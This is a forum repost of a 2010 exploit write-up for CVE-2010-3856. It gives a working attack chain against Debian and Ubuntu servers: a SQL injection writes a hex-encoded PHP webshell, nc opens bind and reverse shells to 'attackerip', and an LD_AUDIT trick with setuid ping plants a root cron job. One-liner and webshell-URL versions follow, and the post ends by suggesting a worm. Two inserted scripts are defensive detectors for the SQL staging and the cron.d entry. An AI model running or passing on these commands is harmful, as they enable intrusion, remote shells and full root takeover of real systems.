[Experience sharing] Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root

Posted on 2018-5-9 09:46:01
  
# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856

--------------
| DISCLAIMER |
--------------

# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

---------
| ABOUT |
---------

Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
See http://www.exploit-db.com/exploits/15304/. Should work on other Linux
distros too.

--------------
| BACKGROUND |
--------------

Typically it isn't possible to use a suid shell or modify /etc/passwd directly after
webshell access (user nobody) to gain root access. But with the DSO vuln we can
launch commands as root, and we can create a socket and connect to the user or set up
a bind shell.

-----------
| EXPLOIT |
-----------

After you have found a SQL injection vuln you can create a PHP backdoor. This is typically
possible with a SELECT ... INTO DUMPFILE/OUTFILE statement. The value is a simple
<? passthru($_GET['c']); ?> backdoor.

---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` (
  `fm` longblob
) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---
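As an added example (not part of the original post), a defender's filter over MySQL general-log lines for the staging pattern shown above: a hex literal that decodes to a PHP open tag, and INTO DUMPFILE/OUTFILE writes that land in a web root. The function names and the four sample log lines are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post: flag MySQL general-log lines
# that stage a hex-encoded PHP payload and then write it to disk with
# INTO DUMPFILE / INTO OUTFILE. The sample log below is constructed.

# Decode a bare hex string (no 0x prefix) using only POSIX printf.
hex_to_text() {
  h=$1
  while [ "${#h}" -ge 2 ]; do
    pair=${h%"${h#??}"}                       # first two hex digits
    h=${h#??}
    printf "\\$(printf '%03o' "0x$pair")"     # hex -> octal escape -> char
  done
}

# Read one query per line on stdin; print a tagged line per suspicious query.
flag_dumpfile_queries() {
  while IFS= read -r line; do
    lower=$(printf '%s' "$line" | tr 'A-Z' 'a-z')
    # 1) a hex literal whose decoded form contains a PHP open tag
    hex=$(printf '%s' "$lower" | sed -n 's/.*0x\([0-9a-f]*\).*/\1/p')
    if [ -n "$hex" ]; then
      case $(hex_to_text "$hex") in
        *'<?'*) printf 'PAYLOAD %s\n' "$line" ;;
      esac
    fi
    # 2) a server-side file write; a .php or web-root target is the real hit
    case $lower in
      *"into dumpfile"*|*"into outfile"*)
        case $lower in
          *htdocs*|*/var/www/*|*.php*) printf 'WEBWRITE %s\n' "$line" ;;
          *)                           printf 'FILEWRITE %s\n' "$line" ;;
        esac ;;
    esac
  done
}

# Constructed sample log: lines 1-2 mirror the post, lines 3-4 are noise.
sample_log() {
  cat <<'EOF'
INSERT INTO fm (fm) VALUES (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e)
SELECT fm FROM fm INTO DUMPFILE '/opt/lampp/htdocs/xampp_backup.php'
SELECT name FROM products WHERE id = 0x41
SELECT * FROM users INTO OUTFILE '/tmp/users.csv'
EOF
}

sample_log | flag_dumpfile_queries
```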
  

  
Now you can connect to the server and create a connection with telnet, nc, write
binary with perl -e 'print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ...
If direct shell access isn't possible you can use PHP code to create your own
binary with PHP fwrite:

---
<?php
$File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";   // raw bytes of the binary to write
fwrite($Handle, $Data);
fclose($Handle);
?>
---

Now use

Bind-Shell:    http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

in your web browser and connect to your shell:

$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

---

Now let's exploit the DSO vuln. You need umask 0 for correct
rw-rw-rw creation of the exploit file /etc/cron.d/exploit:

$ umask 0

This is the shell script for the cron.d entry.

Bind-Shell:    $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh

Now make your shell script executable for cron:

$ chmod u+x /tmp/exploit.sh

Create a rw-rw-rw file in the cron directory using the setuid ping program:

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

Launch a suid root shell every minute:

$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

Now you have a root shell every minute.

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)
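As an added example (not part of the original post), a defender's audit of a cron.d directory for what the steps above leave behind: a group- or world-writable entry, an entry not owned by root, and a job that executes from /tmp. The function names and the throwaway sample directory are constructed for this example; without an argument it inspects /etc/cron.d.

```shell
#!/bin/sh
# Added example, not from the original post: audit a cron.d directory for
# the rw-rw-rw entry that PCPROFILE_OUTPUT creates under umask 0 and for
# root jobs that run a script out of a scratch directory.

audit_cron_dir() {
  dir=${1:-/etc/cron.d}
  for f in "$dir"/*; do
    [ -f "$f" ] || continue
    perms=$(ls -ld "$f" | cut -c1-10)         # e.g. -rw-rw-rw-
    owner=$(ls -ld "$f" | awk '{print $3}')
    case $perms in                            # worst finding wins
      ????????w?) printf 'WORLD-WRITABLE %s %s\n' "$perms" "$f" ;;
      ?????w????) printf 'GROUP-WRITABLE %s %s\n' "$perms" "$f" ;;
    esac
    # Fires on every file of a test copy made by a non-root user; on a real
    # /etc/cron.d anything not owned by root deserves a look.
    [ "$owner" = root ] || printf 'OWNER-NOT-ROOT %s %s\n' "$owner" "$f"
    # Jobs whose command lives where any local user can replace it.
    grep -n -e '/tmp/' -e '/var/tmp/' -e '/dev/shm/' "$f" 2>/dev/null |
      while IFS= read -r hit; do printf 'TMP-EXEC %s:%s\n' "$f" "$hit"; done
  done
}

# Constructed sample: one sane entry and one shaped like the post's
# (world-writable file, root job in /tmp). Prints the directory path.
make_sample_cron_dir() {
  d=$(mktemp -d)
  printf '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/logrotate"
  printf '*/1 * * * * root /tmp/exploit.sh\n' > "$d/exploit"
  chmod 0644 "$d/logrotate"
  chmod 0666 "$d/exploit"
  printf '%s\n' "$d"
}

d=$(make_sample_cron_dir); audit_cron_dir "$d"; rm -rf "$d"
```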
  

  
-------------------
| EXPLOIT oneline |
-------------------

echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------
| EXPLOIT from webshell only |
------------------------------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------

Looks like a wormable bug. A URL-obfuscated (to evade IDS/IPS) worm searches for SQLi/blind SQLi bugs or remote code execution bugs,
then injects the evil URL and does the same for other IPs. It installs a rootkit bot and the game is over.
  

Thread URL: https://www.yunweiku.com/thread-457488-1-1.html